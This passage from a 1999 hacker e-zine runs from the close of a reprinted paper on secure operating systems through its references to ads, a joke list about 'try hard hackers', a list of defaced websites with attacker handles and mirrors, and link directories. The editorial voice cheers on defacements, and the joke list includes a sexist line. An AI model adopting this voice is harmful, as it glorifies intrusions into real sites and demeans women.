mechanisms for access control and cryptography and has demonstrated how mandatory security and trusted path mechanisms address these vulnerabilities. To provide a clear sense of the need for these operating system features, this paper has analyzed concrete examples of current approaches to security and has shown that the security provided by these approaches is inadequate in the absence of such features. Finally, the reader was given a perspective of system security where both secure operating systems and application-space security mechanisms must complement each other in order to provide the correct level of protection. By arguing that secure operating systems are indispensable to system security, the authors hope to spawn a renewed interest in operating system security. If security practitioners were to more openly acknowledge their security solution’s operating system dependencies and state these dependencies as requirements for future operating systems, then the increased demand for secure operating systems would lead to new research and development in the area and ultimately to commercially viable secure systems. In turn, the availability of secure operating systems would enable security practitioners to concentrate on security services that belong in their particular components rather than dooming them to try to address the total security problem with no hope of success. 7 References [1] M. Abrams et al, Information Security: An Integrated Collection of Essays, IEEE Comp. 1995. [2] J. Anderson, Computer Security Technology Planning Study [PDF 7,893K], Air Force Elect. Systems Div., ESD-TR-73-51, October 1972. [3] R. Atkinson. IP Authentication Header (AH) [TXT 30K]. IETF RFC 1826, August 1995. [4] R. Atkinson. IP Encapsulating Security Payload (ESP) [TXT 30K]. IETF RFC 1827, August 1995. [5] R. Atkinson. Security Architecture for the Internet Protocol [TXT 55K]. IETF RFC 1825, August 1995. [6] Badger et al. DTE Firewalls, Initial Measurement and Evaluation Report. Trusted Information Systems Technical Report #0632R, March 1997. [7] L. Badger et al. Practical Domain and Type Enforcement for UNIX. Proceedings of IEEE Symposium on Security and Privacy, May 1995. [8] D. Baker. Fortresses Built Upon Sand. Proceedings of the New Security Paradigms Workshop, 1996. [9] S. Bellovin and W. Cheswick. Network Firewalls. IEEE Communications, September 1994. [10] S. Bellovin and M. Merritt. Limitations of the Kerberos Authentication System. Computer Communications Review 20(5), October 1990. [11] B. Blakley. The Emperor’s Old Armor. Proceedings of the New Security Paradigms Workshop, 1996. [12] W. Boebert and R. Kain, A Further Note on the Confinement Problem. Proceedings of the 30th IEEE International Carnahan Conference on Security Technology, 1996. [13] W. Boebert and R. Kain. A Practical Alternative to Hierarchical Integrity Policies. Proceedings of the 8th National Computer Security Conference, 1985. [14] E. Brewer at al. Basic Flaws in Internet Security and Commerce. http://http.cs.berkeley.edu/~gauthier/endpoint-security.html, 1995. [15] W. Brierley. Integrating Cryptography into Trusted Systems: A Criteria Approach. Proceedings of the 8th IEEE Conference on Computer Security Applications, 1992. [16] Computer Emergency Response Team. Advisory 93:16. [17] D. Chapman and E. Zwicky. Building Internet Firewalls. O’Reilly, 1995. [18] D. Davis. Kerberos Plus RSA for World Wide Web Security. Proceedings of the 1st USENIX Workshop on Electronic Commerce, July 1995. [19] D. Dean et al. Java Security: From HotJava to Netscape and Beyond. Proceedings of the IEEE Symposium on Security and Privacy, 1996. [20] DOD 5200.28-STD. Department of Defense Trusted Computer System Evaluation Criteria, December 1985. [21] M. Eisler et al. Security Mechanism Independence in ONC RPC. Proceedings of the 6th USENIX UNIX Security Symposium, July 1996. [22] D. Ferraiolo and R. Kuhn. Role-Based Access Control. Proceedings of the 15th National Computer Security Conference, 1992. [23] B. Ford et al. Microkernels Meet Recursive Virtual Machines. Proceedings of 2nd USENIX Symposium on Operating Systems Design and Implementation, October 1996. [24] S. Garfinkel. Web Security and Commerce. O’Reilly & Associates, Cambridge, 1997. [25] M. Gasser. Building a Secure Computer System. Van Nostrand Reinhold Company, New York, 1988. [26] I. Goldberg et al. A Secure Environment for Untrusted Helper Applications [PS 173K]. Proceedings of 6th USENIX Unix Security Symposium, July 1996. [27] L. Gong. Java Security: Present and Near Future. IEEE Micro, May/June 1997. [28] R. Graubart. Operating System Support for Trusted Applications. Proceedings of the 15th National Computer Security Conference, 1992. [29] M. Harrison et al. Protection in Operating Systems. Communications of the ACM 19(8), August 1976. [30] T. Jaeger et al. Building Systems that Flexibly Control Downloaded Executable Content. Proceedings of the 6th USENIX Security Symposium, July 1996. [31] J. Kohl and C. Neuman. The Kerberos Network Authentication Service V5 [TXT 268K]. IETF RFC 1510, September 1993. [32] M. Ladue. When Java Was One: Threats from Hostile Byte Code. Proceedings of the 20th National Information Systems Security Conference, 1997. [33] B. Lampson. A Note on the Confinement Problem. Communications of the ACM 16(10), 1973. [34] B. Lampson et al. Authentication in Distributed Systems: Theory and Practice. Proceedings of the 13th ACM Symposium on Operating Systems Principles, 1992. [35] J. Lepreau et al. The Persistent Relevance of the Local Operating System to Global Applications. Proceedings of the 7th ACM SIGOPS European Workshop, September 1996. [36] S. Lewontin. The DCE-Web Toolkit. Proceedings of the 3rd International World Wide Web Conference, 1995. [37] S. Lewontin and M. Zurko. The DCE Web Project: Providing Authorization and Other Distributed Services to the World Wide Web. Proceedings of the 2nd International World Wide Web Conference, 1994. [38] J. Liedtke. L4 Reference Manual. Research Report RC 20549, IBM T. J. Watson Research Center, September 1996. [39] T. Linden. Operating System Structures to Support Security and Reliable Software [PDF 3,424K]. ACM Computing Surveys 8(4), Dec. 1976. [40] D. Martin et al. Blocking Java Applets at the Firewall. Proceedings of the Internet Society Symposium on Network and Distributed Systems Security, 1997. [41] D. Mazieres and M. Kaashoek. Secure Applications Need Flexible Operating Systems. Proceedings of the 6th Workshop on Hot Topics in Operating Systems, May 1997. [42] A. Medvinsky et al. Public Key Utilizing Tickets for Application Servers. IETF Draft Jan 1997 expires July 1997. [43] S. Minear. Providing Policy Control Over Object Operations in a Mach Based System. Proceedings of the 5th USENIX Security Symposium, April 1995. [44] NCSC-TG-005. Version 1. NCSC Trusted Network Interpretation, July 1987. [45] C. Neuman and J. Steiner. Authentication of Unknown Entities on an Insecure Network of Untrusted Workstations. Proceedings of the Usenix Workshop on Workstation Security, August 1988. [46] C. Neuman and T. Ts’o. Kerberos: An Authentication Service for Computer Networks. IEEE Communications Magazine, September 1994. [47] C. Neuman et al. The Kerberos Network Authentication Service V5 R6. IETF Draft July 1997, expires Jan 1998. [48] R. O’Brien and C. Rogers. Developing Applications on LOCK. Proceedings of the 14th National Computer Security Conference, 1991. [49] J. Ousterhout et al. The Safe-Tcl Security Model. Sun Labs Technical Report TR-97-60, March 1997. [50] President’s Commission On Critical Infrastructure Protection. Research and Development Recommendations for Protecting and Assuring Critical National Infrastructures, September 1997. [51] M. Roe and T. Casey. Integrating Cryptography in the Trusted Computing Base. Proceedings of the 6th IEEE Conference on Computer Security Applications, 1990. [52] RSA Laboratories. Public Key Cryptography Standard No. 11 - Cryptoki Version 2.0. RSA Laboratories, pp. 24-25, April 1997. [53] R. Salz. DCE 1.2 Contents Overview. Open Group RFC 63.3, October 1996. [54] J. Saltzer and M. Schroeder. The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), September 1975. [55] B. Schneier. Applied Cryptography, 2nd Edition. John Wiley & Sons, New York, 1996. p. 169-187, 216-225. [56] Secure Computing Corporation. Assurance in the Fluke Microkernel: Formal Security Policy Model, Technical report MD A904-97-C-3047 CDRL A003, March 1998. [57] Secure Computing Corporation. DTOS Covert Channel Analysis Plan, Technical report MD A904-93-C-4209 CDRL A017, May 1997. [58] Secure Computing Corporation. DTOS Generalized Security Policy Specification, Technical report MD A904-93-C-4209 CDRL A019 June 1997. (http://www.securecomputing.com/randt/HTML/dtos.html) [59] Secure Computing Corporation. DTOS General System Security and Assurability Assessment Report, Technical report MD A904-93-C-4209 CDRL A011 June 1997. (http://www.securecomputing.com/randt/HTML/dtos.html) [60] Secure Computing Corporation. LOCKed Workstation Cryptographic Services Study, Technical Report MD A904-94-C-6045 CDRL A009, September 1995. [61] Secure Computing Corporation. Security Requirements Specification and Requirements Rationale Report for the Technical Study Demonstrating the Feasibility of Software-Based Cryptography on INFOSEC Systems, Technical report MDA904-91-C-7103 CDRL A011 and A012, May 1994. [62] W. Sibert. Malicious Data and Computer Security. Proceedings of the 19th National Information Systems Security Conference, 1996. [63] M. Sirbu and J. Chuang. Distributed Authentication in Kerberos using Public Key Cryptography. Proceedings of the Symposium on Network and Distributed System Security, 1997. [64] M. Spasojevic and M. Satyanarayanan. An Empirical Study of a Wide-Area Distributed System. ACM Transactions on Computer Systems 14(2), May 1996. [65] S. Sutton and S. Hinrichs. MISSI B-level Windows NT Feasibility Study Final Report. Technical Report, NSA MISSI Contract MDA904-95-C-4088, December 1996. [66] B. Tung et al. Public Key Cryptography for Initial Authentication in Kerberos. IETF Draft expires Jan 1998. [67] J. Tyger and A. Whitten. WWW Electronic Commerce and Java Trojan Horses. Proceedings of the 2nd Usenix Workshop on Electronic Commerce, November 1996. [68] W. Venema. Murphy’s Law and Computer Security. Proceedings of the 6th USENIX Unix Security Symposium, 1996. [69] D. Wagner and B. Schneier. Analysis of the SSL 3.0 Protocol. Proceedings of the 2nd USENIX Workshop on Electronic Commerce, November, 1996. [70] D. Wallach et al. Extensible Security Architectures for Java. Technical Report 546-97, Dept. of Computer Science, Princeton University, April 1997. [End] HTML links added. Conversion to HTML by JYA/Urban Deadline. @HWA !=----------=- -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. HOW YOU KNOW YOUR A TRY HARD HACKER by Radim Kolar Dokument prevzat ze site The Ethernity Service. Vsechny dokumenty v teto siti jsou anonymni a verejne siritelne. HOW YOU KNOW YOUR A TRY HARD HACKER ------------------------------------- I just wrote this to tell all you try hard hackers something. 1) You goto other hacker pages on the web. 2) You think loading a program that waz made by a hacker is hacking. 3) The only thing you do is get the lastest passwd file from your isp. 4) You goto channels like #hack and ask for passwd files. 5) You don't know where to get warez. 6) You always telnet to hosts and type login: root password: root and stuff like that. 7) You brag about how you are a hacker. 8) You don't know C. 9) Your a girl. 10) You don't know what's a shell. 11) You don't know what Linux, FreeBSD and all those other UNIX's are. 12) You don't have a UNIX OS. 13) You think when using IRC war scripts, your hacking. 14) Asking how to hack other people's computer. 15) You try cracking a shadowed passwd file. 16) You don't know if a passwd file is shadowed or not. 17) You ask what is a T1. 18) You ask how to email bomb and you think email bombing is a form of hacking. 19) Your learning BASIC language. 20) You think you can get into hacking straight away. 21) You don't know how to set up an eggdrop bot. 22) You think .mil stands sites stand for a country. From http://netmag.cz/98/5/hacker.html @HWA SITE.1 #1 http://welcome.to/UnXplained SiteOp: Joe Cool New underground site,features sections from Hacking to the Paranormal This site has a lot of fluff, it looks really professional, some of the content however suffers due to this setup, ie: the hacking webpages text is covered over many html pages instead of one textfile or page for easy downloading, other than that this site kicks ass, be sure to check it out. (coaxed into putting this here from irc by JoeCool, nice site! ... :))) #2 http://www.security-news.com/ .de German site, partially in english, also offers a security newsletter - eentity #3 http://www.hackunlimited.com/ Finnish site, in finnish, very nicely laid out, the only finnish site in our international list, send in those international links! - Ed @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Latest cracked pages courtesy of attrition.org [99.08.07] NT [mozy] CDNiso (www.cdniso.com) [99.08.07] So [HiP] CNCTek (www.cnctek.com) [99.08.07] So [LevelSeven] Deluxe Solutions (www.deluxesolutions.com) [99.08.07] So [SQ] M Energy Catalog (www.energycatalog.com) [99.08.07] NT [fallen angels] Haxan Movies (www.haxan.com) [99.08.07] NT [neeper] #2 Home Web (www.home-web.com) [99.08.07] NT [^ImPiSh[]BlOoD^] Kassy (www.kassy.com) [99.08.07] Sc [Hit2000] M Ostwest Galerie (CH) (www.ostwest-galerie.ch) [99.08.07] So [LevelSeven] Radisson Seven Seas Cruises (www.rssc.com) [99.08.07] NT [kl0wn krew] Vintage Realtors (www.vintagerealtors.com) [99.08.07] NT [ ] Wichitaks Net (www.wichitaks.net) [99.08.07] NT [^DarkManX^] Yale Com (AR) (www.yale.com.ar) [99.08.07] So [Hi-Tech Hate] Malaysian Institute of Diplomacy and Foreign Relation (MY) (www.idhl.gov.my) [99.08.07] So [gH] Internet Wrestling Zone (www.prowrestling.com) [99.08.08] Li [Pakistan HC] Flag Group (www.flag-group.com) [99.08.08] So [?] K CSRC Gov (CN) (www.csrc.gov.cn) [99.08.08] So [keebler elves] #3 IDHL Gov (MY) (www.idhl.gov.my) [99.08.08] So [kl0wn krew] 800-666-suck (www.1800666suck.com) [99.08.08] So [kl0wn krew] Fantasy Car (www.fantasycar.com) [99.08.08] So [kl0wn krew] Asian Slut (www.asianslut.com) [99.08.08] So [kl0wn krew] Bi Studs (www.bistuds.com) [99.08.08] So [Narr0w] M Naked Obsessions (www.nakedobsessions.com) [99.08.08] So [kl0wn krew] M Republican Sex Addicts (www.republicansexaddicts.com) Hacked: http://www.glrppr.uiuc.edu/ By: Mozy Mirror: http://www.attrition.org/mirror/attrition/edu/www.glrppr.uiuc.edu [99.08.10] Li [Elmer Fudd] KSCU 103.3 FM, The Underground Sound of Santa Clara (www.kscu103.com) [99.08.10] NT [Uneek Technologies] State of Michigan Official Site (www.state.mi.us) [99.08.10] So [ ] Wired Digital (www.wired.com) [99.08.10] So [sQ] M Latif (www.latif.com) [99.08.10] NT [Sarin] Federal Energy Regulatory Commission (www.ferc.fed.us) [99.08.10] So [mozy] M Great Lakes Regional Pollution Prevention Roundtable (www.glrppr.uiuc.edu) Hacked: http://www.inaoep.mx (third time) By: Keebler elves Mirror: http://www.attrition.org/mirror/attrition/mx/www.inaoep.mx-3 defaced: www.go.com by: blitzen mirror: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/ and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]